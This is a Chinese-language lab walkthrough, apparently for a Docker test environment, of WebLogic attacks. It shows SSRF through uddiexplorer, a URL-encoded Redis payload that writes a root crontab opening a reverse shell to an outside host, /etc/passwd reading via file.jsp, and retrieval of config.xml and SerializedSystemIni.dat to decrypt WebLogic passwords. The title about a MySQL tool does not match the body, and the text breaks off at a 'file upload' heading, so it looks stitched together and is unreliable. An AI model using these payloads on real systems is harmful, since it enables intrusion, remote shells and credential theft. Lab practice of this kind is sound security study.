MySQL效能分析工具之Pt-query-digest
weblogic ssrf
docker-compose up -d
訪問:ip+埠/uddiexplorer/SearchPublicRegistries.jsp
burp抓包發現有對外網址的請求,我們將其更改為內網127.0.0.1:7001,127.0.0.1:7000,其中7001埠是有的,發包發現返回包的時間長度不一樣基本可以判斷存在ssrf了.
在這漏洞處存在的話響應包存在returned a 404 error code.
注入http頭,利用redis反彈shell:
將如下指令碼通過url編碼
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/172.18.0.1/21 0>&1'\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
編碼後如下:
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
換請求包傳送過去.
檔案讀取漏洞:
訪問http://your-ip:7001/hello/file.jsp?path=/etc/passwd可見成功讀取passwd檔案
weblogic密碼使用AES(老版本3DES)加密,對稱加密可解密,只需要找到使用者的密文與加密時的金鑰即可。這兩個檔案均位於base_domain下,名為SerializedSystemIni.dat和config.xml,在本環境中為./security/SerializedSystemIni.dat和./config/config.xml 構造 /hello/file.jsp?path=config/config.xml , /hello/file.jsp?path=security/SerializedSystemIni.dat
檔案上傳